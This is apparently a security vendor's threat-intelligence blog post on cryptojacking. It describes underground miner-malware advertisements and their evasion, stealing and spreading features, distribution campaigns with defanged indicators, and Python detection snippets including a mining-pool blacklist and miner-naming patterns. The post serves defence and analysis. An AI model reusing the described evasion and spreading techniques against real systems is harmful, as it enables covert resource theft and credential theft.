Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.

This blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.

What Is Mining?

As transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into "blocks" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the "chain" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called "pools" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.


Figure 1: The role of miners
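
To make the chaining concrete, here is a toy proof-of-work loop in Python. It is greatly simplified: real networks use different hash algorithms (Monero uses CryptoNight, discussed below), dynamic difficulty adjustment, and far richer block structures.

import hashlib

def mine_block(prev_hash, transactions, difficulty=4):
    # Search for a nonce so the block hash starts with `difficulty` zero hex digits.
    nonce = 0
    while True:
        header = "%s|%s|%d" % (prev_hash, ",".join(transactions), nonce)
        block_hash = hashlib.sha256(header.encode()).hexdigest()
        if block_hash.startswith("0" * difficulty):
            # This hash becomes the prev_hash of the next block, forming the chain.
            return nonce, block_hash
        nonce += 1

prev = "0" * 64                                    # placeholder "genesis" hash
nonce, prev = mine_block(prev, ["alice->bob:1"])
print("block 1:", nonce, prev)
nonce, prev = mine_block(prev, ["bob->carol:2"])   # chained to the previous block's hash
print("block 2:", nonce, prev)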

Underground Interest

FireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.


Figure 2: Underground keyword mentions

Monero Is King

The majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol and created as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a technology called "ring signatures," which shuffles users' public keys to eliminate the possibility of identifying a particular user, helping ensure transactions are untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are infeasible to reveal through blockchain analysis, ensuring that Monero transactions cannot be linked while also remaining cryptographically secure.

The Monero blockchain also uses a "memory-hard" hashing algorithm called CryptoNight, which, unlike Bitcoin's SHA-256 algorithm, deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers because it keeps CPU mining feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.

Underground Advertisements for Miners

Because most miner utilities are small, open-source tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.

XMR Mining Utilities

  • XMR-STACK
  • MINERGATE
  • XMRMINER
  • CCMINER
  • XMRIG
  • CLAYMORE
  • SGMINER
  • CAST XMR
  • LUKMINER
  • CPUMINER-MULTI

Table 1: Commonly used Monero miner utilities

The following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.

Sample Advertisement #1 (Smart Miner + Builder)

In early April 2018, actor "Mon£y" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD – payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero – that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:

  • Unlimited builds
  • Builder GUI (Figure 4)
  • Written in AutoIT (no dependencies)
  • FUD
  • Safer error handling
  • Uses most recent XMRig code
  • Customizable pool/port
  • Packed with UPX
  • Works on all Windows OS (32- and 64-bit)
  • Madness Mode option


Figure 3: Monero Madness


Figure 4: Monero Madness builder

Sample Advertisement #2 (Miner + Telegram Bot Builder)

In March 2018, FireEye iSIGHT Intelligence observed actor "kent9876" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:

  • Written in C/C++
  • Build size is small (about 100–150 kB)
  • Hides miner process from popular task managers
  • Can run without Administrator privileges (user-mode)
  • Auto-update ability
  • All data encoded with 256-bit key
  • Access to Telegram bot-builder
  • Lifetime support (24/7) via Telegram


Figure 5: Goldig Miner advertisement

Sample Advertisement #3 (Miner + Credential Stealer)

In March 2018, FireEye iSIGHT Intelligence observed actor "TH3FR3D" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:

  • Written in C# (Version 1.0.1.0)
  • Browser stealer for all major browsers (cookies, saved passwords, auto-fill)
  • Monero miner (uses minergate.com pool by default, but can be configured)
  • Filezilla stealer
  • Desktop file grabber (.txt and more)
  • Can download and execute files
  • Update ability
  • USB spreader functionality
  • PHP web panel


Figure 6: Felix HTTP

Sample Advertisement #4 (Miner + RAT)

In January 2018, FireEye iSIGHT Intelligence observed actor "ups" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the CVE-2016-0099 exploit, can download and execute remote files, and can receive commands. Buyers could purchase the Windows or Linux tool for €200 EUR, or €325 EUR for both the Linux and Windows builds, payable via Monero, Bitcoin, Ether, or Dash. According to the actor, the tool offered the following:

Windows Build Specifics

  • Written in C++ (no dependencies)
  • Miner component based on XMRig
  • Easy cryptor and VPS hosting options
  • Web panel (Figure 7)
  • Uses TLS for secured communication
  • Download and execute
  • Auto-update ability
  • Cleanup routine
  • Receive remote commands
  • Perform privilege escalation
  • Features "game mode" (mining stops if user plays game)
  • Proxy feature (based on XMRig)
  • Support (for €20/month)
  • Kills other miners from list
  • Hidden from TaskManager
  • Configurable pool, coin, and wallet (via panel)
  • Can mine the following Cryptonight-based coins:
    • Monero
    • Bytecoin
    • Electroneum
    • DigitalNote
    • Karbowanec
    • Sumokoin
    • Fantomcoin
    • Dinastycoin
    • Dashcoin
    • LeviarCoin
    • BipCoin
    • QuazarCoin
    • Bitcedi

Linux Build Specifics

  • Issues running on Linux servers (higher performance on desktop OS)
  • Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)


Figure 7: Miner bot web panel

Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)

In August 2017, actor "MeatyBanana" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:

  • Configurable miner pool and port (default to minergate)
  • Compatible with both 64- and 86-bit Windows OS
  • Hides from the following popular task managers:
    • Windows Task Manager
    • Process Killer
    • KillProcess
    • System Explorer
    • Process Explorer
    • AnVir
    • Process Hacker
  • Masked as a system driver
  • Does not require administrator privileges
  • No dependencies
  • Registry persistence mechanism
  • Ability to perform "tasks" (download and execute files, navigate to a site, and perform DDoS)
  • USB spreader
  • Support after purchase

The Cost of Cryptojacking

The presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:

  1. Degradation in system performance
  2. Increased cost in electricity
  3. Potential exposure of security holes

Cryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.

In the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control system (SCADA/ICS) environments predominantly rely on decades-old hardware and low-bandwidth networks, so even a slight increase in CPU load or network traffic could leave industrial infrastructure unresponsive, impeding operators from interacting with the controlled process in real time.

The electricity cost, measured in kilowatt-hours (kWh), depends on several factors: how often the malicious miner software is configured to run, how many threads it is configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212 kWh. They estimated that this equated to monthly electrical costs of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.
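
Those monthly estimates are simple arithmetic: daily consumption multiplied by roughly 30 days and the local tariff. The short Python sketch below reproduces the calculation; the per-kWh rates shown are approximations backed out of the researchers' figures, not authoritative tariffs.

def monthly_mining_cost(daily_kwh, rate_per_kwh, days=30):
    # Estimated monthly electricity cost of one continuously mining machine.
    return daily_kwh * days * rate_per_kwh

# 1.212 kWh/day is the measured figure cited above; rates are approximate.
for region, rate in [("United States", 0.29), ("Singapore", 0.15), ("Germany", 0.34)]:
    print("%s: $%.2f per month" % (region, monthly_mining_cost(1.212, rate)))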

Cryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as TRITON.

Cryptocurrency Miner Distribution Techniques

In order to maximize profits, cyber criminals widely disseminate their miners using various techniques, such as incorporating cryptojacking modules into existing botnets, conducting drive-by cryptomining attacks, distributing mobile apps containing cryptojacking code, and spreading cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:

  • User endpoint machines
  • Enterprise servers
  • Websites
  • Mobile devices
  • Industrial control systems

Cryptojacking in the Cloud

Private sector companies and governments alike are increasingly moving their data and applications to the cloud, and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.

The following are some real-world examples of cryptojacking in the cloud:

  • In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the post-exploitation and pre-mining dissemination techniques used in those campaigns.
  • In March 2018, Bleeping Computer reported on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.
  • In February 2018, Bleeping Computer also reported on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web Services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.
  • Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the LA Times online compromise in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.

Incorporation of Cryptojacking into Existing Botnets

FireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.

The following are some real-world examples of cryptojacking being incorporated into existing botnets:

  • In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.
  • On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.
  • In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.
  • In late 2017, FireEye researchers observed Trickbot operators deploy a new module named "testWormDLL" that is a statically compiled copy of the popular XMRig Monero miner.
  • On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.

Drive-By Cryptojacking

In-Browser

FireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites and third-party advertising platforms, and have also been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive, an open-source JavaScript library that, when loaded on a vulnerable website, mines Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.
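
One low-effort way to triage a page for the families named in this post is a simple indicator scan, as sketched below. This is only a starting point: it checks a handful of strings drawn from this post and will miss obfuscated loaders or scripts served through the proxies discussed later in the Detection Avoidance Methods section.

import re
import urllib.request

# Indicator strings drawn from the mining families discussed in this post; a
# production scanner would maintain a much larger, regularly updated list.
MINER_INDICATORS = ["coinhive", "authedmine", "cryptoloot", "deepminer"]

def page_miner_indicators(url):
    html = urllib.request.urlopen(url, timeout=10).read().decode(errors="replace")
    return [s for s in MINER_INDICATORS if re.search(re.escape(s), html, re.I)]

# Example (hypothetical URL):
# print(page_miner_indicators("http://example.com/"))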

The following are some real-world examples of Coinhive being deployed in the wild:

  • In September 2017, Bleeping Computer reported that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.
  • During mid-September 2017, users on Reddit began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).
  • In December 2017, researchers with Sucuri reported on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.
  • Other reporting disclosed the Coinhive script being embedded on the Showtime domain as well as on the LA Times website, both surreptitiously mining Monero.
  • A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user’s web browser is open. However, researchers with Malwarebytes Labs uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As the researchers pointed out, closing the browser window may not be enough to interrupt the activity, and more advanced actions, such as checking the Task Manager, may be required.


Figure 8: Statement from TPB operators on Coinhive script

Malvertising and Exploit Kits

Malvertisements – malicious ads on legitimate websites – commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.

The following are some real-world examples of this activity:

  • In early 2018, researchers with Trend Micro reported that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script coinhive.min.js, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.
  • In April 2018, researchers with Trend Micro also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.
  • Since July 16, 2017, FireEye has observed the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.
  • In January 2018, Check Point researchers discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.

Mobile Cryptojacking

In addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.

The following are some real-world examples of mobile devices being used for cryptojacking:

  • During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:
    • In March 2014, Android malware named "CoinKrypt" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.
    • In March 2014, another form of Android malware – "Android.Trojan.MuchSad.A" or "ANDROIDOS_KAGECOIN.HBT" – was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including "Football Manager Handheld" and "TuneIn Radio." Variants of this malware have reportedly been downloaded by millions of Google Play users.
    • In April 2014, Android malware named "BadLepricon," which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.
    • In October 2014, a type of mobile malware called "Android Slave" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.
  • In December 2017, researchers with Kaspersky Labs reported on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.
  • In January 2018, SophosLabs released a report detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.
  • Between November 2017 and January 2018, researchers with Malwarebytes Labs reported on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.

Cryptojacking Spam Campaigns

FireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, a tactic commonly used to indiscriminately distribute malware. We expect malicious actors to continue using this method to disseminate cryptojacking code for as long as cryptocurrency mining remains profitable.

In late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand, Lyttelton Port of Christchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools supportxmr.com and nanopool.org.


Figure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner

Additionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames was different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).

ZIP Filenames

  • california_540_tax_form_2013_instructions.exe
  • state_bank_of_india_money_transfer_agency.exe
  • format_transfer_sms_banking_bni_ke_bca.exe
  • confirmation_receipt_letter_sample.exe
  • sbi_online_apply_2015_po.exe
  • estimated_tax_payment_coupon_irs.exe
  • how_to_add_a_non_us_bank_account_to_paypal.exe
  • western_union_money_transfer_from_uk_to_bangladesh.exe
  • can_i_transfer_money_from_bank_of_ireland_to_aib_online.exe
  • how_to_open_a_business_bank_account_with_bad_credit_history.exe
  • apply_for_sbi_credit_card_online.exe
  • list_of_lucky_winners_in_dda_housing_scheme_2014.exe

Table 2: Sampling of observed ZIP filenames delivering cryptocurrency miner

Cryptojacking Worms

Following the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit EternalBlue. Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.

The following are some real-world examples of cryptojacking worms:

  • In May 2017, Proofpoint reported a large campaign distributing mining malware "Adylkuzz." This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.
  • Security researchers with Sensors identified a Monero miner worm, dubbed "Rarogminer," in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.
  • In January 2018, researchers at F5 discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.

Detection Avoidance Methods

Another trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptoloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.

In March 2018, Bleeping Computer reported on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.

Several mining proxy tools can be found on GitHub, such as the XMRig Proxy tool, which greatly reduces the number of active pool connections, and the CoinHive Stratum Mining Proxy, which uses Coinhive’s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.

In addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or on cloud-based servers that support Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to Sucuri researchers, cloud-based servers provide many benefits to actors looking to host their own mining applications, including:

  • Available free or at low-cost
  • No maintenance, just upload the crypto-miner app
  • Harder to block as blacklisting the host address could potentially impact access to legitimate services
  • Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts

The combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.

Mining Victim Demographics

Based on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with other reporting, the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).


Figure 10: Cryptocurrency miner detection activity per month


Figure 11: Commonly observed pools and associated ports


Figure 12: Top 10 affected countries


Figure 13: Top five affected industries


Figure 14: Top affected industries by country

Mitigation Techniques

Unencrypted Stratum Sessions

According to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine must run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture in which clients send subscription requests to join a pool and servers publish messages to their subscribed clients. These messages are simple, readable JSON-RPC messages. Subscription requests include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.


Figure 15: Stratum subscription request parameters
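
To make the DPI idea concrete, the following minimal Python sketch flags cleartext payloads that look like Stratum subscription requests by checking for the id/method/params trio and a "mining." method name. The example message contents and the function name are our own illustrative choices, not a production signature.

import json

# A minimal sketch of the DPI idea described above: flag cleartext TCP payloads
# that look like Stratum JSON-RPC subscription requests. Real Stratum traffic is
# newline-delimited JSON; field contents vary by pool and miner, so the example
# below is illustrative rather than a definitive signature.
EXAMPLE_SUBSCRIBE = b'{"id": 1, "method": "mining.subscribe", "params": ["example-miner/1.0"]}\n'

def looks_like_stratum_subscribe(payload: bytes) -> bool:
    """Return True if a TCP payload resembles a Stratum subscription request."""
    for line in payload.splitlines():
        try:
            msg = json.loads(line.decode("utf-8", errors="ignore"))
        except ValueError:
            continue
        if not isinstance(msg, dict):
            continue
        # Stratum requests carry the JSON-RPC trio: id, method, params.
        if not all(key in msg for key in ("id", "method", "params")):
            continue
        method = msg.get("method")
        if isinstance(method, str) and method.startswith("mining."):
            return True
    return False

print(looks_like_stratum_subscribe(EXAMPLE_SUBSCRIBE))  # True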

Encrypted Stratum Sessions

In the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. The downside to this approach is the effort required to identify and update the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.
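
As a rough sketch of that blacklist approach, the snippet below matches a destination hostname (taken, for example, from DNS logs or the TLS SNI field) against a small set of pool domains. The listed domains are examples only (minergate and nanopool appear in the detection data above; supportxmr.com is simply a well-known Monero pool), and, as noted, any real list requires continual curation.

# A minimal sketch of the blacklist approach: when payloads are encrypted, match
# the destination hostname against a curated list of mining pool domains.
# The entries below are examples only, not a maintained list.
POOL_BLACKLIST = {
    "minergate.com",
    "nanopool.org",
    "supportxmr.com",
}

def is_blacklisted_pool(hostname: str) -> bool:
    """True if hostname equals, or is a subdomain of, a blacklisted pool domain."""
    hostname = hostname.lower().rstrip(".")
    return any(hostname == d or hostname.endswith("." + d) for d in POOL_BLACKLIST)

print(is_blacklisted_pool("xmr-eu1.nanopool.org"))  # True (illustrative hostname)
print(is_blacklisted_pool("example.com"))           # False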

Browser-Based Sessions

Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.

As defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:

  • Blocking domains known to have hosted coin mining scripts
  • Blocking websites of known mining project websites, such as Coinhive
  • Blocking scripts altogether
  • Using an ad-blocker or coin mining-specific browser add-ons
  • Detecting commonly used naming conventions (a simple illustration follows this list)
  • Alerting and blocking traffic destined for known popular mining pools
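
As a deliberately simplified illustration of the naming-convention strategy above, the following Python sketch scans fetched page content for strings commonly associated with in-browser miners. Coinhive is named in this post; the specific patterns and the function name are illustrative assumptions rather than a vetted signature set.

import re

# A simplified sketch of the "naming conventions" strategy: scan page content
# for strings commonly associated with browser-based miners. These patterns are
# illustrative only and would need to be maintained like any other signature.
MINER_PATTERNS = [
    re.compile(rb"coinhive(\.min)?\.js", re.IGNORECASE),
    re.compile(rb"coinhive\.anonymous", re.IGNORECASE),
    re.compile(rb"cryptonight", re.IGNORECASE),
]

def page_miner_indicators(html: bytes) -> list:
    """Return the patterns that matched the page body, if any."""
    return [p.pattern.decode() for p in MINER_PATTERNS if p.search(html)]

sample = b'<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
print(page_miner_indicators(sample))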

Some of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.

It is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.

Outlook

In underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate a continued upward trend of threat actors conducting cryptocurrency mining operations, and we expect this focus to continue throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as other forms of fraud or theft. Further, victims may not realize their computer is infected beyond noticing a slowdown in system performance.

Due to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.

Because of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.

Chinese Espionage Group TEMP.Periscope Targets Cambodia Ahead of July 2018 Elections and Reveals Broad Operations Globally

Introduction

